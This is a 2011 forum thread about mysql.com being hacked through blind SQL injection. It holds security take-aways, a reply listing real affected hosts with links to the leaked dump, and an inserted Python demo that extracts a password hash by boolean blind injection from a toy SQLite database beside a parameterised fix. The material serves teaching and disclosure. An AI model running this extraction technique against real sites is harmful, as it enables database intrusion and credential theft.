Mysql.com Vulnerable To Blind Sql Injection Vulnerability by Slyr0x: 11:21pm On Mar 27, 2011 |
Allow me to point out a little bit of irony in this headline: a website for one of the more popular open-source database alternatives gets completely compromised using blind SQL injection. Ouch. Someone going by the moniker "Jack haxor" posted this to the Full Disclosure mailing list just a little while ago, giving a nice explanation of what's happened and, more importantly, where the vulnerable target page is (customers/view/index.html) so others can go and play for themselves. MySQL has (as of this writing) not issued a statement yet, which probably means they're scrambling to close up and clean up the mess, whatever that mess may be. Did the attacker get into anything more than just the databases behind the website? Maybe we'll know, maybe we won't, but this is at the very least very unsettling for the open-source database organization. Hopefully they have clean, check-summed backups, right? Oh, and if you're interested in seeing the handiwork that resulted from this compromise, check out this pastebin.com link; I swear I had nothing to do with that rabbit/hat graphic.

Some take-aways from this one:
1. Never re-use passwords across too many websites of different security levels.
2. Use complex pass-phrases as much as possible so they're harder to crack.
3. Back up, then check-sum your backups and keep them offline in case you need a restore point.
4. Hiding the SQL error from an attacker will still get you compromised (blind SQL injection).
5. Check your code; attackers don't sleep, and won't spare you just because you're an open-source, charitable project.
6. It can happen to anyone, anywhere, at any time.

Link ---> http://h30501.www3.hp.com/t5/Following-the-White-Rabbit-A/MySQL-WebSite-Hacked-by-Ironically-Blind-SQL-Injection/ba-p/25359
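As an added illustration of take-away 4 (this is editor-supplied example code, not part of the post above or of the HP article it reproduces), the block below shows a boolean-based blind injection against a toy SQLite-backed "customer view" lookup that never returns an error message, followed by the same lookup with the value bound as a query parameter. Every name in it (the tables, columns, the placeholder hash value and the `1 AND ...` payload shape) is an assumption made for the demonstration and has nothing to do with the real mysql.com application.

```python
"""Boolean-based blind SQL injection against a toy 'customer view' lookup,
beside the parameterised fix.  Added example: the schema, table and column
names are assumptions and have nothing to do with the real mysql.com site."""
import sqlite3
from typing import Callable, Tuple

HEX = "0123456789abcdef"
Oracle = Callable[[str], bool]


def build_db() -> sqlite3.Connection:
    """Constructed sample data; 'a1b2c3d4' is a placeholder, not a real hash."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO customers VALUES (1, 'Acme Ltd'), (2, 'Globex');
        CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pw_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', 'a1b2c3d4');
    """)
    return conn


def view_customer_vulnerable(conn: sqlite3.Connection, customer_id: str) -> bool:
    """The page only reveals whether a customer row exists, and SQL errors are
    swallowed.  That is the situation take-away 4 warns about: no error text,
    yet one bit of truth still leaks per request."""
    sql = "SELECT name FROM customers WHERE id = " + customer_id  # string concat
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def view_customer_fixed(conn: sqlite3.Connection, customer_id: str) -> bool:
    """Same page, but the value is bound as a parameter, so user input can
    never alter the structure of the query."""
    try:
        row = conn.execute(
            "SELECT name FROM customers WHERE id = ?", (customer_id,)
        ).fetchone()
        return row is not None
    except sqlite3.Error:
        return False


def find_length(oracle: Oracle, subquery: str, max_len: int = 64) -> int:
    """Binary-search the length of the secret using only true/false answers."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"1 AND LENGTH(({subquery})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_blind(oracle: Oracle, subquery: str, length: int, alphabet: str = HEX) -> str:
    """Recover the secret one character at a time: each request asks
    'is character N equal to X?' and the page answers with a row / no row."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            if oracle(f"1 AND SUBSTR(({subquery}),{pos},1) = '{ch}'"):
                recovered += ch
                break
        else:
            break  # nothing matched: alphabet too small, stop early
    return recovered


def demo() -> Tuple[str, str]:
    """Run the attack against both versions; returns (leaked, leaked_after_fix)."""
    conn = build_db()
    secret = "SELECT pw_hash FROM users WHERE login = 'admin'"
    vulnerable: Oracle = lambda p: view_customer_vulnerable(conn, p)
    fixed: Oracle = lambda p: view_customer_fixed(conn, p)
    leaked = extract_blind(vulnerable, secret, find_length(vulnerable, secret))
    after_fix = extract_blind(fixed, secret, find_length(fixed, secret))
    return leaked, after_fix


if __name__ == "__main__":
    print(demo())  # ('a1b2c3d4', '')
```

The vulnerable handler never shows a stack trace or a database error, which is exactly why suppressing error output is not a defence: the attacker only needs a page that behaves differently for a true and a false condition. With the parameterised version the same payloads are compared as a literal string against the id column and match nothing, so both the length probe and the character probe return nothing.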
Re: Mysql.com Vulnerable To Blind Sql Injection Vulnerability by Slyr0x: 11:26pm On Mar 27, 2011 |
Full Disclosure here --> http://pastebin.com/BayvYdcP --> http://pastebin.com/7y9LymN3
+) Targets:
www.reman.sun.com
www.ibb.sun.com
www.mysql.com
www.mysql.fr
www.mysql.de
www.mysql.it
www-jp.mysql.com
Re: Mysql.com Vulnerable To Blind Sql Injection Vulnerability by ogzille(m): 8:53am On Mar 28, 2011 |
nawa o!!! |
Re: Mysql.com Vulnerable To Blind Sql Injection Vulnerability by WebMonk(m): 10:33am On Mar 28, 2011 |
I guess there are no exceptions |
Re: Mysql.com Vulnerable To Blind Sql Injection Vulnerability by Slyr0x: 8:53pm On Mar 28, 2011 |
ogzille: Na serious wa.
WebMonk: No exceptions o. Check http://www.zone-h.org/archive/special=1
Re: Mysql.com Vulnerable To Blind Sql Injection Vulnerability by Nobody: 12:48am On Mar 31, 2011 |
This is serious. Obviously these guys don't have "give up" in their books. I get at least 2 attacks daily on one of my age-long projects, and it's not a popular website. What happens if it's popular?